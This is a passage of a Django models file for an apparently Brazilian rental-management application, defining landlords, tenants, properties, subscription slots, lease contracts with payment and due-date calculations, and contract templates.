unique=True, help_text='Digite apenas números',\n validators=[MinLengthValidator(11), MaxLengthValidator(11), apenas_numeros])\n telefone = models.CharField(max_length=11, null=False, blank=True, unique=True,\n help_text='Celular/Digite apenas números',\n validators=[MinLengthValidator(11), MaxLengthValidator(11), apenas_numeros])\n email = models.EmailField(unique=True)\n nacionalidade = models.CharField(null=True, blank=True, max_length=40, default='Brasileiro(a)')\n estadocivil = models.IntegerField(null=True, blank=True, verbose_name='Estado Civil', choices=estados_civis)\n ocupacao = models.CharField(null=True, blank=True, max_length=85, verbose_name='Ocupação')\n endereco_completo = models.CharField(null=True, blank=True, max_length=150, verbose_name='Endereço Completo')\n dados_pagamento1 = models.CharField(null=True, blank=True, max_length=90,\n 
verbose_name='Informações de pagamentos 1',\n help_text='Sua conta PIX ou dados bancários ou carteira crypto, etc...')\n dados_pagamento2 = models.CharField(null=True, blank=True, max_length=90,\n verbose_name='Informações de pagamentos 2')\n uuid = models.CharField(null=False, editable=False, max_length=10, unique=True, default=user_uuid)\n tickets = models.IntegerField(default=10)\n # Outros poderão ter acesso ao uuid por cópias digitais de pdfs que poderão ser repassadas pelo usuário\n\n locat_slots = models.IntegerField(default=2)\n\n vis_ger_ultim_order_by = models.CharField(default='vencimento_atual', null=True, blank=True, max_length=60)\n\n data_eventos_i = models.DateField(blank=True, null=True)\n itens_eventos = models.CharField(blank=True, null=True, max_length=31, default=['1', '2', '3', '4', '5', '6'])\n qtd_eventos = models.IntegerField(blank=True, null=True, default=25)\n ordem_eventos = models.IntegerField(default=1, blank=False)\n\n recibo_ultimo = models.ForeignKey('Contrato', null=True, blank=True, related_name='usuario_recibo_set',\n on_delete=models.SET_NULL)\n recibo_preenchimento = models.IntegerField(null=True, blank=True)\n\n tabela_ultima_data_ger = models.IntegerField(null=True, blank=True)\n tabela_meses_qtd = models.IntegerField(null=True, blank=True)\n tabela_imov_qtd = models.IntegerField(null=True, blank=True)\n tabela_mostrar_ativos = models.BooleanField(null=True, blank=True)\n\n contrato_ultimo = models.ForeignKey('Contrato', null=True, blank=True, related_name='usuario_contrato_set',\n on_delete=models.SET_NULL)\n\n def locat_auto_registro_link(self):\n return reverse('home:Locatario Auto-Registro', args=[self.username, self.uuid])\n\n def nome_completo(self):\n return f'{str(self.first_name)} {str(self.last_name)}'\n\n def primeiro_ultimo_nome(self):\n nome = self.nome_completo().split()\n return f'{nome[0]} {nome[len(nome) - 1]}'\n\n def f_cpf(self):\n if self.CPF:\n return cpf_format(self.CPF)\n\n def f_tel(self):\n if self.telefone:\n return cel_format(self.telefone)\n\n def arrecadacao_total(self):\n try:\n total = 0\n pagamentos = Pagamento.objects.filter(ao_locador=self).values_list('valor_pago')\n\n for pagamento in pagamentos:\n total += int(pagamento[0])\n\n return valor_format(str(total))\n except:\n return None\n\n def arrecadacao_mensal(self):\n try:\n contratos_user = Contrato.objects.ativos_hoje().filter(do_locador=self)\n arrecadacao_mensal = 0\n for contrato in contratos_user:\n arrecadacao_mensal += int(contrato.valor_mensal)\n return valor_format(str(arrecadacao_mensal))\n except:\n return None\n\n def valor_total_contratos_ativos(self):\n try:\n contratos_user = Contrato.objects.ativos_hoje().filter(do_locador=self)\n valor_total_contratos_ativos = 0\n for contrato in contratos_user:\n valor_total_contratos_ativos += int(contrato.valor_do_contrato())\n return valor_format(str(valor_total_contratos_ativos))\n except:\n return None\n\n def valor_total_contratos(self):\n try:\n contratos_user = Contrato.objects.filter(do_locador=self)\n valor_total_contratos = 0\n for contrato in contratos_user:\n valor_total_contratos += int(contrato.valor_do_contrato())\n return valor_format(str(valor_total_contratos))\n except:\n return None\n\n def tem_slot_disponivel(self):\n slots = Slot.objects.filter(do_usuario=self)\n for slot in slots:\n if slot.imovel() is None:\n return True\n return False\n\n\nclass SlotsManager(models.Manager):\n def ativos(self):\n slots_qs = self.all()\n lista = []\n for slot in slots_qs:\n if slot.ativado() is True:\n 
lista.append(slot.pk)\n slots_ativos = Slot.objects.filter(pk__in=lista)\n return slots_ativos\n\n def inativos(self):\n slots_qs = self.all()\n lista = []\n for slot in slots_qs:\n if slot.ativado() is False:\n lista.append(slot.pk)\n slots_inativos = Slot.objects.filter(pk__in=lista)\n return slots_inativos\n\n def inativos_com_imovel(self):\n slots_qs = self.all()\n lista = []\n for slot in slots_qs:\n if slot.ativado() is False and slot.imovel() is not None:\n lista.append(slot.pk)\n slots_inativos = Slot.objects.filter(pk__in=lista)\n return slots_inativos\n\n\nclass Slot(models.Model):\n do_usuario = models.ForeignKey('Usuario', null=False, blank=False, on_delete=models.CASCADE)\n da_tarefa = models.OneToOneField('Tarefa', null=True, blank=True, on_delete=models.SET_NULL)\n\n gratuito = models.BooleanField(null=False, default=False)\n criado_em = models.DateTimeField(auto_now_add=True)\n tickets = models.PositiveIntegerField(default=0)\n objects = SlotsManager()\n\n class Meta:\n verbose_name_plural = 'Slots'\n ordering = ('pk',)\n\n def __str__(self):\n return (f'{self.pk}: {\"Gratuito\" if self.gratuito else \"Pago\"}/Criado: {self.criado_em}'\n f'/Tickets: {self.tickets}/{self.do_usuario}/{self.imovel()}')\n\n def imovel(self):\n try:\n slots = Slot.objects.filter(do_usuario=self.do_usuario).order_by('pk')\n imoveis = Imovei.objects.filter(do_locador=self.do_usuario).order_by('data_registro')\n return imoveis[list(slots).index(self)]\n except:\n return None\n\n def vencimento(self):\n # colocar para vencer um dia após, não zero(evitar reclamações dos usuários/não pode comer tempo deles)\n data = self.criado_em + relativedelta(days=int(self.tickets) * 30)\n return data.date()\n\n def dias_ativo(self):\n inicial = self.criado_em.date()\n final = self.vencimento()\n delta = final - inicial\n return int(delta.days)\n\n def dias_passados(self):\n inicial = self.criado_em.date()\n final = datetime.today().date()\n delta = final - inicial\n return int(delta.days)\n\n def dias_restando(self):\n dias_ativo = self.dias_ativo()\n dias_pasados = self.dias_passados()\n dias_restando = dias_ativo - dias_pasados\n return dias_restando if dias_restando >= 0 else 0\n\n def tickets_restando(self):\n \"\"\"Aqui deve retornar os tickets(self.tickets) menos a quantia de tickets equivalentes aos dias que já passaram\n esde a criação do slot até hoje\"\"\"\n tickets_passados = floor(self.dias_passados() / 30)\n tickets_restando = self.tickets - tickets_passados\n return tickets_restando if tickets_restando >= 0 else 0\n\n def ativado(self):\n if self.gratuito:\n return True\n else:\n return False if datetime.today().date() >= self.vencimento() else True\n\n def borda(self):\n if self.gratuito:\n return 'border-success'\n else:\n return 'border-secondary' if self.ativado() else 'border-warning'\n\n\nclass LocatariosManager(models.Manager):\n def nao_temporarios(self):\n # Locatarios cadastrados pelos usuários, não que se cadastraram pelo link(Portanto seus cadastros\n # estão no modo temporário(para aprovação))\n return self.exclude(temporario=True)\n\n\nclass Locatario(models.Model):\n do_locador = models.ForeignKey('Usuario', null=True, blank=True, on_delete=models.CASCADE)\n da_tarefa = models.OneToOneField('Tarefa', null=True, blank=True, on_delete=models.SET_NULL)\n\n nome = models.CharField(max_length=100, blank=False, verbose_name='Nome Completo')\n docs = ResizedImageField(size=[1280, None], upload_to='locatarios_docs/%Y/%m/', null=True, blank=True,\n verbose_name='Documentos', 
validators=[tratar_imagem, FileExtensionValidator])\n RG = models.CharField(max_length=9, null=False, blank=True, help_text='Digite apenas números',\n validators=[MinLengthValidator(7), MaxLengthValidator(9), apenas_numeros])\n CPF = models.CharField(max_length=11, null=False, blank=False, help_text='Digite apenas números',\n validators=[MinLengthValidator(11), MaxLengthValidator(11), apenas_numeros])\n ocupacao = models.CharField(max_length=85, verbose_name='Ocupação')\n endereco_completo = models.CharField(null=True, blank=True, max_length=150, verbose_name='Endereço Completo')\n telefone1 = models.CharField(max_length=11, blank=False, verbose_name='Telefone 1',\n help_text='Celular/Digite apenas números',\n validators=[MinLengthValidator(11), MaxLengthValidator(11), apenas_numeros])\n telefone2 = models.CharField(max_length=11, null=True, blank=True, verbose_name='Telefone 2',\n help_text='Celular/Digite apenas números',\n validators=[MinLengthValidator(11), MaxLengthValidator(11), apenas_numeros])\n email = models.EmailField(max_length=45, null=True, blank=True)\n nacionalidade = models.CharField(max_length=40, blank=False, default='Brasileiro(a)')\n estadocivil = models.IntegerField(blank=False, verbose_name='Estado Civil', choices=estados_civis)\n data_registro = models.DateTimeField(auto_now_add=True)\n temporario = models.BooleanField(null=True)\n objects = LocatariosManager()\n\n class Meta:\n constraints = [\n models.UniqueConstraint(fields=[\"CPF\", \"do_locador\"], name=\"cpf_locatario_por_usuario\"),\n ]\n verbose_name_plural = 'Locatários'\n\n def __str__(self):\n return f'{self.nome}'\n\n def com_contratos(self):\n contratos = Contrato.objects.ativos_hoje().filter(do_locador=self.do_locador, do_locatario=self)\n return contratos or None\n\n def com_imoveis(self):\n contratos = self.com_contratos()\n contratos_ativos = []\n for contrato in contratos:\n contratos_ativos.append(contrato)\n if contratos_ativos:\n imoveis_pk = [contrato.do_imovel.pk for contrato in contratos_ativos]\n imoveis = Imovei.objects.filter(pk__in=imoveis_pk)\n return imoveis\n else:\n return None\n\n def primeiro_ultimo_nome(self):\n return f'{self.nome.split()[:1][0]} {self.nome.split()[len(self.nome.split()) - 1:][0]}'\n\n def imoveis_alugados(self):\n x = Imovei.objects.filter(com_locatario=self.pk)\n return x\n\n def f_cpf(self):\n if self.CPF:\n return cpf_format(self.CPF)\n\n def f_tel1(self):\n if self.telefone1:\n return cel_format(self.telefone1)\n\n def f_tel2(self):\n if self.telefone2:\n return cel_format(self.telefone2)\n else:\n return None\n\n def contratos_qtd(self):\n return Contrato.objects.filter(do_locatario=self).count()\n\n\ntipos_de_imovel = (\n (0, 'Casa'),\n (1, 'Apartamento'),\n (2, 'Kitnet'),\n (3, 'Box/Loja'),\n (4, 'Escritório'),\n (5, 'Depósito/Armazém'),\n (6, 'Galpão'))\n\n\nclass ImovGrupo(models.Model):\n do_usuario = models.ForeignKey('Usuario', null=True, blank=True, on_delete=models.CASCADE)\n nome = models.CharField(max_length=35, blank=False, verbose_name='Criar Grupo')\n tipo = models.IntegerField(null=True, blank=True, choices=tipos_de_imovel, verbose_name='Tipo de Imóvel')\n imoveis = models.ManyToManyField('Imovei', blank=True)\n\n class Meta:\n verbose_name_plural = 'Grupos de imóveis'\n ordering = ('nome',)\n\n def __str__(self):\n return self.nome\n\n def arrecadacao_total(self):\n try:\n total = 0\n imoveis = Imovei.objects.filter(grupo=self)\n for imovel in imoveis:\n total += imovel.receita_acumulada()\n return valor_format(str(total))\n except:\n return 
None\n\n def arrecadacao_mensal(self):\n try:\n imoveis = Imovei.objects.filter(grupo=self)\n contratos_user = Contrato.objects.ativos_hoje().filter(do_imovel__in=imoveis, do_locador=self.do_usuario)\n arrecadacao_mensal = 0\n for contrato in contratos_user:\n arrecadacao_mensal += int(contrato.valor_mensal)\n return valor_format(str(arrecadacao_mensal))\n except:\n return None\n\n def valor_total_contratos_ativos(self):\n try:\n imoveis = Imovei.objects.filter(grupo=self)\n contratos_user = Contrato.objects.ativos_hoje().filter(do_imovel__in=imoveis, do_locador=self.do_usuario)\n valor_total_contratos_ativos = 0\n for contrato in contratos_user:\n valor_total_contratos_ativos += int(contrato.valor_do_contrato())\n return valor_format(str(valor_total_contratos_ativos))\n except:\n return None\n\n def valor_total_contratos(self):\n try:\n imoveis = Imovei.objects.filter(grupo=self)\n contratos_user = Contrato.objects.filter(do_imovel__in=imoveis, do_locador=self.do_usuario)\n valor_total_contratos = 0\n for contrato in contratos_user:\n valor_total_contratos += int(contrato.valor_do_contrato())\n return valor_format(str(valor_total_contratos))\n except:\n return None\n\n\nclass ImoveiManager(models.Manager):\n def ativos(self):\n imoveis_qs = self\n lista = []\n for imovel in imoveis_qs:\n if imovel.esta_ocupado() is True:\n lista.append(imovel.pk)\n imoveis_ativos = Imovei.objects.filter(pk__in=lista)\n return imoveis_ativos\n\n\nestados = (\n ('AC', 'Acre'), ('AL', 'Alagoas'), ('AP', 'Amapá'), ('AM', 'Amazonas'), ('BA', 'Bahia'), ('CE', 'Ceará'),\n ('DF', 'Distrito Federal'), ('ES', 'Espírito Santo'), ('GO', 'Goiás'), ('MA', 'Maranhão'), ('MT', 'Mato Grosso'),\n ('MS', 'Mato Grosso do Sul'), ('MG', 'Minas Gerais'), ('PA', 'Pará'), ('PB', 'Paraíba'), ('PR', 'Paraná'),\n ('PE', 'Pernambuco'), ('PI', 'Piauí'), ('RJ', 'Rio de Janeiro'), ('RN', 'Rio Grande do Norte'),\n ('RS', 'Rio Grande do Sul'), ('RO', 'Rondônia'), ('RR', 'Roraima'), ('SC', 'Santa Catarina'), ('SP', 'São Paulo'),\n ('SE', 'Sergipe'), ('TO', 'Tocantins')\n)\n\n\nclass Imovei(models.Model):\n do_locador = models.ForeignKey('Usuario', blank=False, on_delete=models.CASCADE)\n grupo = models.ForeignKey('ImovGrupo', blank=True, null=True, on_delete=models.SET_NULL)\n\n nome = models.CharField(max_length=25, blank=False, verbose_name='Rótulo')\n cep = models.CharField(max_length=8, blank=False, verbose_name='CEP',\n validators=[MinLengthValidator(8), MaxLengthValidator(8), apenas_numeros])\n endereco = models.CharField(max_length=150, blank=False, verbose_name='Endereço')\n numero = models.IntegerField(blank=False,\n validators=[MinValueValidator(1), MaxValueValidator(999999), apenas_numeros])\n complemento = models.CharField(max_length=80, null=True, blank=True)\n bairro = models.CharField(max_length=30, blank=False)\n cidade = models.CharField(max_length=30, blank=False)\n estado = models.CharField(max_length=2, blank=False, choices=estados)\n uc_energia = models.CharField(max_length=15, null=True, blank=True, verbose_name='Matrícula de Energia',\n validators=[MinLengthValidator(4), MaxLengthValidator(15)])\n uc_agua = models.CharField(max_length=15, null=True, blank=True, verbose_name='Matrícula de Saneamento',\n validators=[MinLengthValidator(4), MaxLengthValidator(15)])\n data_registro = models.DateTimeField(default=datetime.now)\n objects = ImoveiManager()\n\n class Meta:\n constraints = [\n models.UniqueConstraint(fields=[\"nome\", \"do_locador\"], name=\"nome_imovel_por_usuario\"),\n ]\n verbose_name_plural = 'Imóveis'\n 
ordering = ['-nome']\n\n def __str__(self):\n return f'{self.nome} ({self.grupo if self.grupo else \"Sem grupo\"})'\n\n def contrato_atual(self):\n contratos = Contrato.objects.ativos_hoje().filter(do_locador=self.do_locador, do_imovel=self)\n if contratos:\n return contratos[0]\n else:\n return None\n\n def contrato_todos(self):\n contratos = Contrato.objects.filter(do_locador=self.do_locador, do_imovel=self)\n if contratos:\n return contratos\n else:\n return None\n\n def com_locatario(self):\n if self.contrato_atual():\n return self.contrato_atual().do_locatario\n else:\n return None\n\n def nogrupo(self):\n return '' if self.grupo is None else self.grupo\n\n def esta_ocupado(self):\n return False if self.com_locatario is None else True\n\n def f_cep(self):\n return cep_format(self.cep)\n\n def endereco_base(self):\n complemento = f'({self.complemento})'\n return f'{self.endereco}, Nº{self.numero}{complemento if self.complemento else \"\"} - {self.bairro}'\n\n def endereco_completo(self):\n return f'{self.endereco_base()} - {self.cidade}/{self.estado}, {self.f_cep()}'\n\n def receita_acumulada(self):\n parcelas = Parcela.objects.filter(do_imovel=self, apagada=False)\n total = 0\n for parcela in parcelas:\n total += int(parcela.tt_pago)\n return total\n\n def receita_acumulada_format(self):\n return valor_format(str(self.receita_acumulada()))\n\n def em_slot(self):\n \"\"\" retorna true se estiver em slot e false se não \"\"\"\n slots = Slot.objects.filter(do_usuario=self.do_locador)\n imoveis_em_slot = []\n for slot in slots:\n if slot.ativado():\n imoveis_em_slot.append(slot.imovel())\n return True if self in imoveis_em_slot else False\n\n\nclass ContratoManager(models.Manager):\n def ativos_hoje(self):\n hoje = datetime.today().date()\n contratos_qs = self.filter(em_posse=True, rescindido=False, data_entrada__lte=hoje)\n lista = []\n for contrato in contratos_qs:\n if contrato.periodo_ativo_hoje():\n lista.append(contrato.pk)\n contratos_ativos = Contrato.objects.filter(pk__in=lista)\n return contratos_ativos\n\n def ativos_hoje_e_antes_de(self, data):\n contratos_qs = self.filter(em_posse=True, rescindido=False, data_entrada__lte=data)\n lista = []\n for contrato in contratos_qs:\n if contrato.periodo_ativo_hoje() or contrato.periodo_ativo_antes_de(data):\n lista.append(contrato.pk)\n contratos_ativos = Contrato.objects.filter(pk__in=lista)\n return contratos_ativos\n\n def ativos_margem(self):\n hoje = datetime.today().date()\n contratos_qs = self.filter(rescindido=False)\n lista = []\n for contrato in contratos_qs:\n if contrato.periodo_ativo_hoje() or contrato.periodo_ativo_futuramente() or \\\n contrato.periodo_ativo_xx_dias_atras():\n lista.append(contrato.pk)\n contratos_ativos = Contrato.objects.filter(pk__in=lista)\n return contratos_ativos\n\n def inativos(self):\n pass\n\n def ativos_e_no_slot(self):\n hoje = datetime.today().date()\n contratos_qs = self.filter(em_posse=True, rescindido=False, data_entrada__lte=hoje)\n lista = []\n for contrato in contratos_qs:\n if contrato.periodo_ativo_hoje() is True and contrato.do_imovel.em_slot() is True:\n lista.append(contrato.pk)\n contratos_ativos_slot = Contrato.objects.filter(pk__in=lista)\n return contratos_ativos_slot\n\n def ativos_e_sem_slot(self):\n hoje = datetime.today().date()\n contratos_qs = self.filter(em_posse=True, rescindido=False, data_entrada__lte=hoje)\n lista = []\n for contrato in contratos_qs:\n if contrato.periodo_ativo_hoje() is True and contrato.do_imovel.em_slot() is False:\n lista.append(contrato.pk)\n 
contratos_ativos_sem_slot = Contrato.objects.filter(pk__in=lista)\n return contratos_ativos_sem_slot\n\n\nclass Contrato(models.Model):\n do_locador = models.ForeignKey('Usuario', null=True, blank=True, on_delete=models.CASCADE)\n do_locatario = models.ForeignKey('Locatario', on_delete=models.CASCADE,\n verbose_name='Locatário')\n do_imovel = models.ForeignKey('Imovei', on_delete=models.CASCADE, verbose_name='No imóvel')\n da_tarefa = models.OneToOneField('Tarefa', null=True, blank=True, on_delete=models.SET_NULL)\n\n data_entrada = models.DateField(blank=False, verbose_name='Data de Entrada')\n duracao = models.IntegerField(null=False, blank=False, verbose_name='Duração do contrato(Meses)',\n validators=[MaxValueValidator(18), MinValueValidator(1)])\n valor_mensal = models.CharField(max_length=9, verbose_name='Valor Mensal (R$) ', blank=False,\n help_text='Digite apenas números',\n validators=[apenas_numeros, MinLengthValidator(3)])\n dia_vencimento = models.IntegerField(blank=False, validators=[MaxValueValidator(28), MinValueValidator(1)],\n verbose_name='Dia do vencimento', help_text='(1-28)')\n em_posse = models.BooleanField(default=False, null=False,\n help_text='Marque quando receber a sua via assinada e registrada em cartório')\n rescindido = models.BooleanField(default=False, null=False, help_text='Marque caso haja rescisão do contrato')\n codigo = models.CharField(null=False, editable=False, max_length=11, default=gerar_codigo_contrato)\n data_de_rescisao = models.DateField(blank=True, verbose_name='Data da rescisão', null=True)\n recibos_pdf = models.FileField(upload_to='recibos_docs/%Y/%m/', blank=True, verbose_name='Recibos')\n data_registro = models.DateTimeField(auto_now_add=True)\n objects = ContratoManager()\n\n class Meta:\n ordering = ['-data_entrada']\n\n def __str__(self):\n \"\"\"'O objeto count' diz em que posição este contrato fica na lista de contratos feitos com este locador neste\n imóvel\"\"\"\n contratos = Contrato.objects.filter(do_locador=self.do_locador, do_locatario=self.do_locatario,\n do_imovel=self.do_imovel)\n count = (f'{list(contratos).index(self) + 2}' if len(contratos) > 1 else '1')\n return (f'({self.do_locatario.primeiro_ultimo_nome()} em '\n f'{self.do_imovel.nome} - nº{count} - '\n f'{self.data_entrada.strftime(\"%m/%Y\")})')\n\n def nome_completo(self):\n return f'{self.do_locatario.nome} - {self.do_imovel} - {self.data_entrada.strftime(\"%d/%m/%Y\")} - ' \\\n f'({self.codigo})'\n\n def valor_format(self):\n return valor_format(self.valor_mensal)\n\n def valor_por_extenso(self):\n reais = self.valor_mensal[:-2]\n centavos = self.valor_mensal[-2:]\n centavos_format = f' e {num2words(int(centavos), lang=\"pt_BR\")} centavos'\n return f'{num2words(int(reais), lang=\"pt_BR\").capitalize()} reais{centavos_format if int(centavos) > 1 else \"\"}'\n\n def valor_do_contrato(self):\n return str(int(self.valor_mensal) * int(self.duracao))\n\n def valor_do_contrato_format(self):\n return valor_format(self.valor_do_contrato())\n\n def valor_do_contrato_por_extenso(self):\n valor = str(int(self.valor_mensal) * int(self.duracao))\n reais = valor[:-2]\n centavos = valor[-2:]\n centavos_format = f' e {num2words(int(centavos), lang=\"pt_BR\")} centavos'\n return f'{num2words(int(reais), lang=\"pt_BR\").capitalize()} reais{centavos_format if int(centavos) > 1 else \"\"}'\n\n def total_quitado(self):\n valores = Pagamento.objects.filter(ao_contrato=self).values_list('valor_pago')\n valor_tt = 0\n for valor in valores:\n valor_tt += int(valor[0])\n return 
valor_tt\n\n    def total_pg_format(self):\n        if self.total_quitado() is None:\n            return 'R$0,00'\n        else:\n            return valor_format(str(self.total_quitado()))\n\n    def falta_pg(self):\n        if self.total_quitado() is None:\n            return self.valor_do_contrato()\n        else:\n            return str((int(self.valor_mensal) * int(self.duracao)) - self.total_quitado())\n\n    def falta_pg_format(self):\n        return valor_format(self.falta_pg())\n\n    def em_maos(self):\n        return 'Sim' if self.em_posse else 'Não'\n\n    def data_saida(self):\n        data = self.data_entrada + relativedelta(months=self.duracao)\n        return data\n\n    def periodo_vencido(self):\n        return True if self.data_saida() > datetime.today() else False\n\n    def periodo_ativo_hoje(self):\n        hoje = datetime.today().date()\n        return True if self.data_entrada <= hoje <= self.data_saida() else False\n\n    def periodo_ativo_antes_de(self, data):\n        return True if self.data_entrada <= data <= self.data_saida() else False\n\n    def periodo_ativo_futuramente(self):\n        return True if self.data_entrada > datetime.today().date() else False\n\n    def periodo_ativo_xx_dias_atras(self, dias=45):\n        return True if self.data_saida() >= datetime.today().date() + timedelta(days=-dias) else False\n\n    def pagamento_total(self):\n        pagamentos = Pagamento.objects.filter(ao_contrato=self.pk).values('valor_pago')\n        valor_tt = 0\n        for valor in pagamentos:\n            valor_tt += int(valor['valor_pago'])\n        return valor_tt\n\n    def duracao_dias(self):\n        delta = self.data_saida() - self.data_entrada\n        return delta.days\n\n    def transcorrido_dias(self):\n        delta = datetime.today().date() - self.data_entrada\n        return delta.days\n\n    def faltando_dias(self):\n        return self.duracao_dias() - self.transcorrido_dias()\n\n    def passou_do_limite(self):\n        return True if int(self.faltando_dias()) <= 30 else False\n\n    def recibos_entregues_qtd(self):\n        x = Parcela.objects.filter(do_contrato=self, recibo_entregue=True).count()\n        return x\n\n    def parcelas_pagas_qtd(self):\n        numero = self.pagamento_total() / int(self.valor_mensal)\n        return int(floor(numero))\n\n    def quitado(self):\n        return True if self.total_quitado() == int(self.valor_do_contrato()) else False\n\n    def title_pagou_parcelas(self):\n        if self.parcelas_pagas_qtd() > 0:\n            plural = 's' if self.parcelas_pagas_qtd() > 1 else ''\n            return f'Quitou {self.parcelas_pagas_qtd()} parcela{plural} de {self.duracao}'\n        else:\n            return 'Nenhuma parcela quitada ainda'\n\n    def faltando_recibos_qtd(self):\n        try:\n            return self.parcelas_pagas_qtd() - self.recibos_entregues_qtd()\n        except:\n            return None\n\n    def duracao_meses_por_extenso(self):\n        return num2words(self.duracao, lang='pt_BR')\n\n    def dia_vencimento_por_extenso(self):\n        return num2words(self.dia_vencimento, lang='pt_BR')\n\n    def vencimento_atual(self):\n        parcela_n_kit = Parcela.objects.filter(do_contrato=self, apagada=False).order_by('data_pagm_ref')\n        parcelas = []\n        for parcela in parcela_n_kit:\n            if int(parcela.tt_pago) < int(self.valor_mensal) or int(parcela.tt_pago) == 0:\n                parcelas.append(parcela)\n        return parcelas[0].data_pagm_ref if parcelas else None\n\n    def vencimento_atual_textual(self):\n        txt = '📃✔️'\n        title = 'O contrato está quitado'\n        if self.vencimento_atual() is not None:\n            hoje = datetime.today().date()\n            vencim_atual = self.vencimento_atual()\n            delta = hoje - vencim_atual\n            delta2 = vencim_atual - hoje\n            if vencim_atual == hoje + relativedelta(days=-1):\n                txt = f'⭕ Venceu ontem ({vencim_atual.strftime(\"%d/%m/%Y\")})'\n                title = ''\n            elif vencim_atual < hoje + relativedelta(days=-1):\n                txt = f'⭕ Venceu em 
{vencim_atual.strftime(\"%d/%m/%Y\")} ({delta.days} dias atrás)'\n title = ''\n elif vencim_atual == hoje:\n txt = f'🟡 Vence hoje ({vencim_atual.strftime(\"%d/%m/%Y\")})'\n title = ''\n elif vencim_atual == hoje + relativedelta(days=+1):\n txt = f'🟡 Vencerá amanhã ({vencim_atual.strftime(\"%d/%m/%Y\")})'\n title = ''\n elif vencim_atual > hoje + relativedelta(days=+1):\n if delta2.days <= 5:\n txt = f'🟡 Vencerá em {vencim_atual.strftime(\"%d/%m/%Y\")} (em {delta2.days} dias)'\n else:\n txt = f'Vencerá em {vencim_atual.strftime(\"%d/%m/%Y\")} (em {delta2.days} dias)'\n title = ''\n return txt, title\n\n def divida_atual_meses(self):\n parcelas = Parcela.objects.filter(do_contrato=self, apagada=False, data_pagm_ref__lte=datetime.today().date())\n parcelas_vencidas_n_quitadas = 0\n for parcela in parcelas:\n if int(parcela.tt_pago) < int(self.valor_mensal):\n parcelas_vencidas_n_quitadas += 1\n return parcelas_vencidas_n_quitadas\n\n def divida_atual_valor(self):\n parcelas = Parcela.objects.filter(do_contrato=self, apagada=False, data_pagm_ref__lte=datetime.today().date())\n parcelas_vencidas_n_quitadas = []\n for parcela in parcelas:\n if int(parcela.tt_pago) < int(self.valor_mensal) and parcela.apagada is False:\n parcelas_vencidas_n_quitadas.append(int(parcela.tt_pago))\n soma_tt_pg = sum([i for i in parcelas_vencidas_n_quitadas])\n valor = (len(parcelas_vencidas_n_quitadas) * int(self.valor_mensal)) - (int(soma_tt_pg) if soma_tt_pg else 0)\n return valor, valor_format(str(valor))\n\n\nclass ContratoModelo(models.Model):\n titulo = models.CharField(blank=False, max_length=120, verbose_name='', help_text='Titulo', unique=True)\n autor = models.ForeignKey('Usuario', blank=False, null=True, related_name='contratomod_autor_set',\n on_delete=models.SET_NULL)\n usuarios = models.ManyToManyField('Usuario', related_name='contratos_modelos', blank=True,\n through='UsuarioContratoModelo')\n excluidos = models.ManyToManyField('Usuario', related_name='contratos_modelos_excluidos', blank=True)\n\n descricao = models.CharField(blank=True, max_length=480, verbose_name='', help_text='Descrição')\n corpo = RichTextField(null=True, blank=True, verbose_name='', validators=[tamanho_max_mb])\n data_criacao = models.DateTimeField(auto_now_add=True)\n variaveis = models.JSONField(null=True, blank=True)\n condicoes = models.JSONField(null=True, blank=True)\n comunidade = models.BooleanField(default=False, verbose_name='Comunidade')\n visualizar = models.FileField(null=True)\n\n class Meta:\n verbose_name_plural = 'Modelos de contratos'\n\n def __str__(self):\n return f'{self.titulo}'\n\n def display_variaveis(self):\n variaveis = []\n for variavel in list(self.variaveis):\n if variavel in modelo_variaveis:\n variaveis.append([modelo_variaveis[variavel][0], modelo_variaveis[variavel][1]])\n return variaveis if len(variaveis) > 0 else False\n\n def display_condicoes(self):\n condicoes = []\n for condicao in list(self.condicoes):\n if condicao in modelo_condicoes:\n condicoes.append([modelo_condicoes[condicao][0], modelo_condicoes[condicao][1]])\n return condicoes if len(condicoes) > 0 else False\n\n def verificar_utilizacao_config(self):\n \"\"\"Este método visa verificar se existe algum 'ContratoDocConfig' utilizando esta instancia de modelo\"\"\"\n configs_do_user = ContratoDocConfig.objects.filter(do_modelo=self).count()\n return True if configs_do_user > 0 else False\n\n def verificar_utilizacao_usuarios(self, usuario_pk):\n \"\"\"Este método visa verificar se existe algum 'usuário' além do usuário verificador 
com uma cópia desta\n instancia de modelo\"\"\"\n outros_usuarios = self.usuarios.all().exclude(pk=usuario_pk).count()\n return True if outros_usuarios > 0 else False\n\n def delete(self, *args, **kwargs):\n \"\"\"Apagar o contrato apenas se não houver nenhum ContratoDocConfig ou outro usuário utilizando-o, caso contrário\n # apagar o contrato apenas para o usuário, retirar da comunidade caso ele seja o autor.\"\"\"\n try:\n user = Usuario.objects.get(pk=kwargs['kwargs'].get('user_pk'))\n um = self.verificar_utilizacao_config()\n dois = self.verificar_utilizacao_usuarios(user.pk)\n if um or dois:\n self.usuarios.remove(user)\n if self.autor == user:\n self.comunidade = False\n self.excluidos.add(user)\n self.save(update_fields=['comunidade', ])\n if um and not dois:\n self.titulo = f'{self.titulo}///só_config///{parcela_uuid()}'\n self.save(update_fields=['titulo', ])\n\n else:\n super(ContratoModelo, self).delete()\n except:\n super(ContratoModelo, self).delete()\n\n\ntipos_de_locacao = (\n (None, '-----------'),\n (1, 'residencial'),\n (2, 'não residencial'))\n\n\nclass UsuarioContratoModelo(models.Model):\n usuario = models.ForeignKey('Usuario', on_delete=models.CASCADE, related_name='usuario_contrato_modelo')\n contrato_modelo = models.ForeignKey('ContratoModelo', on_delete=models.CASCADE,\n related_name='usuario_contrato_modelo')\n data_criacao = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return f'{self.contrato_modelo} - {self.usuario} - {self.data_criacao}'\n\n class Meta:\n verbose_name_plural = 'Modelos de contratos-Usuários'\n\n\nclass ContratoDocConfig(models.Model):\n do_contrato = models.ForeignKey('Contrato', null=True, blank=False, on_delete=models.CASCADE)\n do_modelo = models.ForeignKey('ContratoModelo', null=True, blank=False, on_delete=models.SET_NULL,\n verbose_name='Modelo de contrato')\n\n tipo_de_locacao = models.IntegerField(null=True, blank=True, choices=tipos_de_locacao,\n verbose_name='Tipo de Locação')\n caucao = models.IntegerField(null=True, blank=True,\n validators=[MinValueValidator(0), MaxValueValidator(3), apenas_numeros])\n\n fiador_nome = models.CharField(max_length=100, null=True, blank=True, verbose_name='Nome Completo')\n fiador_RG = models.CharField(max_length=9, null=True, blank=True, help_text='Digite apenas números',\n validators=[MinLengthValidator(7), MaxLengthValidator(9), apenas_numeros],\n verbose_name='RG')\n fiador_CPF = models.CharField(max_length=11, null=True, blank=True, help_text='Digite apenas números',\n validators=[MinLengthValidator(11), MaxLengthValidator(11), apenas_numeros],\n 